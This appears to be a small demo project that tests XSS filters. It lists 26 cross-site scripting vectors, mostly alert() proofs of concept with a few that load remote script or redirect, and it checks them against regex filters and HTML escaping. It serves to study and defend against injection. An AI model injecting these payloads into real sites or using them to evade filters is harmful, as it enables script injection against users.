<html>
<html>
<head>
  <title>XSS</title>
</head>
<body>
  <a href="xss.html">View XSS's in action here</a>
   - some may interfer with other, to view an individual vector remove all other vectors
  
  <br>
  <br>
  <br>
  <hr>
  <pre id="results"></pre>
  <div id="results_html"></div>
  <div id="results_text"></div>
  <script type="text/javascript" src="script.js"></script>
</body>
</html>
var xsss = [
`<script >alert("XSS - 1");</script >`,
`<script type="application/javascript">alert("XSS - 2");</script >`,
`<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >`,
`<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />`,
`<input type="image" src onerror="alert('XSS - 5')">`,
`<object data="a.a" onerror="alert('XSS - 6')" />`,
`<object data="a.a" onerror="alert('XSS - 7')">`,
`<link data="a.a" onerror="alert('XSS - 8')">`,
`<input onfocus="console.log('XSS - 9')" autofocus> // Uses console.log as "alert" will cause infinate loop`,
`<video ><source onerror="alert('XSS - 10')" >`,
`<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 11')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">`,
`<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 12')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;" />`,
`<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 13')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;"></iframe >`,
`<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >`,
`<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">`,
`<iframe style="display:none;" src="//a.a" onload="alert('XSS - 16');"></iframe >`,
`<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 17')"></div >`,
`<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 18')">`,
`<frameset onload="alert('XSS - 19')"><frame onload="Limited support"></frameset >`,
`<a href="javascript:alert('XSS - 20')" style="text-decoration: none; color:#000;" > `,
`<a onclick="alert('XSS - 21')" style="text-decoration: none; color:#000;" > `,
`<a onmouseover="alert('XSS - 22')" style="text-decoration: none; color:#000;" > `,
`<body onunload="alert('XSS - 23')">`,
`<body onresize="alert('XSS - 24');">`,
`<body onload="alert('XSS - 25')">`,
`<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">`,
]

var xssSimple = new RegExp('((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)', 'i')
var xssImgSrc = new RegExp('((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)', 'i')
var xssAnyTag = new RegExp('<(|\/|[^\/>][^>]+|\/[^>][^>]+)>')

log("\n## Current isXss function:")
isXss = function(value) {
  return xssSimple.test(value) || xssImgSrc.test(value)
}

// prints false for all
for(var i in xsss){
  log( isXss(xsss[i]) + ": isXss(`" + xsss[i] + "`)");
}

log("\n## isXss function that strips all tags:")
// Current isXss function that also checks for any tags
isXss = function(value) {
  return xssSimple.test(value) || xssImgSrc.test(value) || xssAnyTag.test(value)
}

// prints true for all
for(var i in xsss){
  log( isXss(xsss[i]) + ": isXss(`" + xsss[i] + "`)");
}

var entityMap = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
  '/': '&#x2F;',
  '`': '&#x60;',
  '=': '&#x3D;'
};
 
escapeHtml = function(value) {
  return String(value).replace(/[&<>"'`=\/]/g, function (s) {
    return entityMap[s];
  });
}

log_html("<b>Directly writing escaped Html safely</b>")

for(var i in xsss){
  log_html( escapeHtml(xsss[i]) );
}

log_text("\n## Directly writing unescaped Html safely to the text attribute</b>")

for(var i in xsss){
  log_text(xsss[i]);
}

function log_text(html){
  document.getElementById("results_text").innerText += html + "\n";
}

function log_html(html){
  document.getElementById("results_html").innerHTML += html + "<br>";
}

function log(text){
  document.getElementById("results").innerText += text + "\n";
}
To test an individual vector, remove all except that line

<script >alert("XSS - 1");</script >
<script type="application/javascript">alert("XSS - 2");</script >
<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >
<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />
<input type="image" src onerror="alert('XSS - 5')">
<object data="a.a" onerror="alert('XSS - 6')" />
<object data="a.a" onerror="alert('XSS - 7')">
<link data="a.a" onerror="alert('XSS - 8')">
<input onfocus="console.log('XSS - 9')" autofocus> // Uses console.log as "alert" will cause infinate loop
<video ><source onerror="alert('XSS - 10')" >
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 11')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 12')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;" />
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 13')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">
<iframe style="display:none;" src="//a.a" onload="alert('XSS - 16');"></iframe >
<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 17')"></div >
<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 18')">
<frameset onload="alert('XSS - 19')"><frame onload="Limited support"></frameset >
<a href="javascript:alert('XSS - 20')" style="text-decoration: none; color:#000;" > 
<a onclick="alert('XSS - 21')" style="text-decoration: none; color:#000;" > 
<a onmouseover="alert('XSS - 22')" style="text-decoration: none; color:#000;" > 
<body onunload="alert('XSS - 23')">
<body onresize="alert('XSS - 24');">
<body onload="alert('XSS - 25')">
  <!-- XSS - 26: No JavaScript, but fully hides the page and prevents any clicks -->
<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">